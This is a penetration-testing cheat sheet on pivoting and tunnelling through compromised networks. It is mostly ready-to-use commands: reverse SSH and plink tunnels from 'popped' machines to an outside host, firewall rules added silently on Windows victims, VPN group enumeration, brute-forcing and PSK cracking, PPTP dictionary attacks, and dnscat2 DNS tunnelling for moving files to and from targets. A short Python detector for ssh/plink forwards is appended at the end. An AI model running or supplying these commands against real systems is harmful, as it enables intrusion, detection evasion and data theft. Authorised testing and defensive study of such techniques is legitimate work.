
Network Pivoting and Tunneling Guide


Written by Sajal Jain · 2 min read

This is purely for educational and informational purposes. Only use these techniques where allowed or where you have permission to do so. Power comes with great responsibility.

  • Port Forwarding – accept traffic on a given IP address and port and redirect it to a different IP address and port
apt-get install rinetd
cat /etc/rinetd.conf
# bindaddress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80
  • SSH Local Port Forwarding: supports bi-directional communication channels
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
  • SSH Remote Port Forwarding: suitable for popping a remote shell on an internal non-routable network
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
  • SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local attacking box to tunnel ALL incoming traffic to ANY host in the DMZ network on ANY PORT
ssh -D <local proxy port> -p <remote port> <target>
  • Proxychains – Perform Nmap scan within a DMZ from an external computer
    • Create a reverse SSH tunnel from the popped machine on port 2222
ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com
ssh -f -N -R 2222:<local host>:22 root@<remote host>
    • Create a dynamic application-level port forward on 8080 through 2222
ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>
    • Leverage the SSH SOCKS server to perform Nmap scan on the network using proxy chains
proxychains nmap --top-ports=20 -sT -Pn $ip/24
  • HTTP Tunneling
nc -vvn $ip 8888
  • Traffic Encapsulation – Bypassing deep packet inspection
    • HTTP tunnel
    • On the server-side:
sudo hts -F <server ip addr>:<port of your app> 80
    • On the client-side:
sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel

  • Tunnel Remote Desktop (RDP) from a Popped Windows machine to your network
    • Tunnel on port 22
plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>
    • Port 22 blocked? Try port 80? or 443?
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80
  • Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel (bypass deep packet inspection)
    • On the Windows machine, add the required firewall rules without prompting the user
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
    • Start the http tunnel client
      • httptunnel_client.exe
    • Create HTTP reverse shell by connecting to localhost port 3000
      • plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000
  • VLAN Hopping
    • Clone and run frogger.sh:
      git clone https://github.com/nccgroup/vlan-hopping.git
      cd vlan-hopping
      chmod 700 frogger.sh
      ./frogger.sh
  • VPN Overtaking
    • Identify VPN servers:
      ./udp-protocol-scanner.pl -p ike $ip
    • Scan a range for VPN servers:
      ./udp-protocol-scanner.pl -p ike -f ip.txt
    • Use IKEForce to enumerate or dictionary attack VPN servers:
      pip install pyip
      git clone https://github.com/SpiderLabs/ikeforce.git
    • Perform IKE VPN enumeration with IKEForce: ./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic
    • Bruteforce IKE VPN using IKEForce: ./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1 
    • Use ike-scan to capture the PSK hash:
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
ike-scan -M -A -n example_group -P hash-file.txt TARGET-IP
    • Use psk-crack to crack the PSK hash:
psk-crack hash-file.txt
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
  • PPTP Overtaking
    • Identifying PPTP: it listens on TCP port 1723
      Nmap PPTP fingerprint: nmap -Pn -sV -p 1723 TARGET(S)
    • PPTP dictionary attack: thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
  • Port Forwarding/Redirection
  • PuTTY Link tunnel – SSH Tunneling
    • Forward remote port to local address: plink.exe -P 22 -l root -pw "1337" -R 445:<local host>:445 <remote host>
  • SSH Pivoting
    • SSH pivoting from one network to another: ssh -D <local host>:1010 -p 22 user@<remote host>
  • DNS Tunneling
    • dnscat2 supports “download” and “upload” commands for getting files (data and programs) to and from the target machine.
    • Attacking machine installation:
      apt-get update
      apt-get -y install ruby-dev git make g++
      gem install bundler
      git clone https://github.com/iagox86/dnscat2.git
      cd dnscat2/server
      bundle install
    • Run dnscat2:
      ruby ./dnscat2.rb
      dnscat2> New session established: 1422
      dnscat2> session -i 1422
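
From the monitoring side, every ssh and plink forward in the list above appears as a -L, -R or -D option on a process command line. The Python sketch below is an added example, not part of the original write-up: it extracts those forwards from process-creation log lines, and its function name, sample command lines, hosts and addresses are constructed for illustration.

```python
KINDS = {"L": "local", "R": "remote", "D": "dynamic"}
# OpenSSH client options that take a value (from ssh's getopt string).
SSH_VALUE_OPTS = set("bceilmopBDEFIJLOPQRSwW")

def find_forwards(cmdline):
    """Return [(kind, spec)] for each -L/-R/-D forward in an ssh or plink command line."""
    argv = cmdline.split()   # assumption: whitespace tokenising is enough for these flags
    if not argv:
        return []
    prog = argv[0].replace("\\", "/").rsplit("/", 1)[-1].lower()
    if prog not in ("ssh", "plink", "plink.exe"):
        return []
    is_ssh = prog == "ssh"
    found, positionals, i = [], 0, 1
    while i < len(argv):
        arg = argv[i]
        i += 1
        if len(arg) < 2 or arg[0] != "-":
            positionals += is_ssh
            if positionals == 2:
                break        # ssh: second bare word starts the remote command (ls -R)
            continue
        # ssh bundles one-letter flags (-fND ...); plink options are whole words (-pw)
        letters = arg[1:] if is_ssh else arg[1]
        for pos, ch in enumerate(letters):
            if ch not in KINDS and not (is_ssh and ch in SSH_VALUE_OPTS):
                continue
            value = arg[pos + 2:]            # glued form: -R22222:localhost:22
            if not value and i < len(argv):
                value = argv[i]              # separate form: -R 2222:localhost:22
                i += 1
            if ch in KINDS:
                found.append((KINDS[ch], value))
            break                            # remainder of the word was the value
    return found

# Constructed process-creation command lines (hosts and addresses are placeholders).
SAMPLES = [
    "ssh -f -N -T -R22222:localhost:22 gw.example.com",
    "ssh -fND 127.0.0.1:8080 -p 2222 user@gw.example.com",
    "ssh admin@gw.example.com ls -R /var/log",
    r"C:\tools\plink.exe -l root -pw secret -R 3389:127.0.0.1:3389 gw.example.com -P 80",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(find_forwards(line), "<-", line)
```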

DISCLAIMER: Everything is gathered from different web-resources. Parts of the above writeup belong to unknown authors.
